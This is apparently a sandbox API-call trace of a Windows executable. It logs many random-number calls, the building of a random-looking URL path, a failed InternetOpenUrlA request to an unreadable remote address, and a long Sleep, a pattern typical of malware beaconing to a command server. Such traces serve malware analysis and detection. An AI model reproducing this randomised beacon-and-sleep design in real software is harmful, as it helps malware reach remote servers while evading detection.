[0184.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.318] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.318] GetProcessHeap () returned 0x440000 [0184.318] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0184.318] lstrcpyA (in: lpString1=0x473350, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0184.318] lstrcatA (in: lpString1="P²¡\x03", lpString2="/krqtaZZ3eprk00v7gxl825Csef/gyr9RzNdxs0Nt0l1aymE0hezzNbo9Hjm1djowt78y7rC/" | out: lpString1="P²¡\x03/krqtaZZ3eprk00v7gxl825Csef/gyr9RzNdxs0Nt0l1aymE0hezzNbo9Hjm1djowt78y7rC/") returned="P²¡\x03/krqtaZZ3eprk00v7gxl825Csef/gyr9RzNdxs0Nt0l1aymE0hezzNbo9Hjm1djowt78y7rC/" [0184.318] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0184.318] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/krqtaZZ3eprk00v7gxl825Csef/gyr9RzNdxs0Nt0l1aymE0hezzNbo9Hjm1djowt78y7rC/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0184.318] GetProcessHeap () returned 0x440000 [0184.318] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0184.318] GetProcessHeap () returned 0x440000 [0184.318] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0184.318] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0184.318] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0184.318] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0184.319] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0184.509] Sleep (dwMilliseconds=0x14e04) [0184.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0184.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0184.726] GetProcessHeap () returned 0x440000 [0184.727] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02250 [0184.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0184.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02251, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a02251) returned 0x0 [0184.727] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0184.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0184.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02282, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x3a02282) returned 0x0 [0184.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.745] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.745] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.745] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.745] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.748] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.748] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0184.749] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.749] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.749] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.749] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.749] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.749] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.749] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0184.750] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.750] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.750] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.751] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.751] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.752] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.752] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.752] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.752] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, 